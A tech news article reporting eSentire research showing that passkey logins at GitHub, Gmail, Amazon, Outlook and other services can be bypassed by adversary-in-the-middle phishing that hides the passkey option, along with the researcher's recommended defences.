Passkey implementations by Google, Amazon, Microsoft vulnerable to AitM attacks, research

Attackers can proxy login pages removing mention of passkeys and prompting users to resort to passwords, finds eSentire

Passkey implementations by Google, Amazon and Microsoft vulnerable to AitM attacks, research

Image:
Passkey implementations by Google, Amazon and Microsoft vulnerable to AitM attacks, research

Passkeys have surged in popularity in recent months as organisations recognise them as an effective way to combat phishing attacks, and with major tech companies such as Apple, Microsoft and Google promoting their adoption.

Based on FIDO [Fast Identity Online] standards, passkeys are designed as a replacement for passwords. They are the equivalent of hardware keys, the best known being the Yubikey, but are present on the device itself. As with a Yubikey, passkeys store a private key to cryptographically sign a challenge from a website to prove a user's identity.

They are more secure than traditional passwords, which may be forgotten or used on multiple sites, and they are an effective protection against phishing attacks - if implemented correctly.

But like any security tool, they are not perfect, and you can be sure that threat actors will always be seeking points of weakness.

Joe Stewart, principal security researcher at eSentire's Threat Response Unit, has reviewed the implementation of passkey technology by prominent software providers. In a blog post documenting his team's findings, Stewart said cybercriminals can access accounts protected by passkeys on various online platforms, including banking and social media, by using Adversary-in-the-Middle (AitM) phishing attacks.

"In reviewing the implementation of several of the most popular software service's passkey authentication flow, nearly all of them can still be bypassed by AitM phishing, using authentication method redaction attacks," he wrote.

AitM attacks

AitM phishing attacks take advantage of the fact that most website passkey implementations still offer less secure backup authentication methods, even when a passkey has been added to the account. AitM attackers can manipulate the login page that the user sees, redacting references to passkey authentication in order to persuade the user to resort to the fallback methods. This can be achieved by modifying the HTML, CSS, images or JavaScript of the login page as it is proxied through to the end user.

eSentire's researchers demonstrated this method using open source Evilginx AitM software to simulate a phishing attack against GitHub. Evilginx sits between the user and GitHub, presenting the user with an altered login page for the service, with references to the passkey removed. The user, forgetting that he or she usually logs in via passkey, is therefore likely to enter the fallback method of username and password. These credentials can be harvested by the attacker.

Image
esentire evilginx github
Description
AitM attack on GitHub. Source: eSentire

And it's not just GitHub, that's vulnerable. Google Gmail, Amazon's E-Commerce website (not AWS), eBay, Microsoft Outlook email (the free version), Docusign, CVS Pharmacy and Coinbase all have insecure fallbacks, Stewart told Computing.

"It is not that these companies have implemented the passkey technology itself incorrectly, but rather it is the way they offer alternate and less secure login methods for the user to choose from. And AitM allows the attacker to choose the method for them."

In offering alternative login methods, these vendors, many of which have actively promoted passkeys, are inadvertently sacrificing security for convenience,.

"I believe from the very beginning, when the tech vendors and online retailers were developing their passkey implementations, they just were not thinking about the different ways a cybercriminal could get around their passkey login flow because it is assumed passkeys are just secure by default due to their features," Stewart told Computing.

"When they were designing their process, they simply did not consider how a hacker could use an AitM attack to take over a user's web session and manipulate anything the user sees in the browser tab while they are logging into their online account."

AitM attacks against passkeys are relatively easy to conduct, he added, "especially with the plethora of phishing proxy as-a-service solutions being sold on the hacker underground".

Remove the password option

Unfortunately there is no particularly easy solution, other than adding additional secure authentication factors, such as a hardware key. Stewart recommends that services remove the password option altogether.

"The very best practice organisations can implement for sensitive and critical online accounts is to get rid of passwords entirely, and only provide the option for the account holder to use passkeys to access one's account," he said.

"However, to prevent users from being locked out of their account, platforms must make it mandatory that the user has at least two passkeys for each online account, stored separately."

But this puts a burden on the user that many companies will be unlikely to contemplate. Slightly less secure - but still better than the existing situation and offering a solution in case all passkeys are lost - is sending a "warded link" by email or SMS. "This is similar to a magic link that would naturally break the user out of the AitM attack session but is additionally secured by other multifactor authentication methods for extra security," Stewart said.

There is currently no perfect recovery method that is both secure and user-friendly, but understanding how AitM attacks against passkeys work, assuming every login session is compromised and improving workflows to reduce the probability of compromise can help teams improve security without sacrificing usability.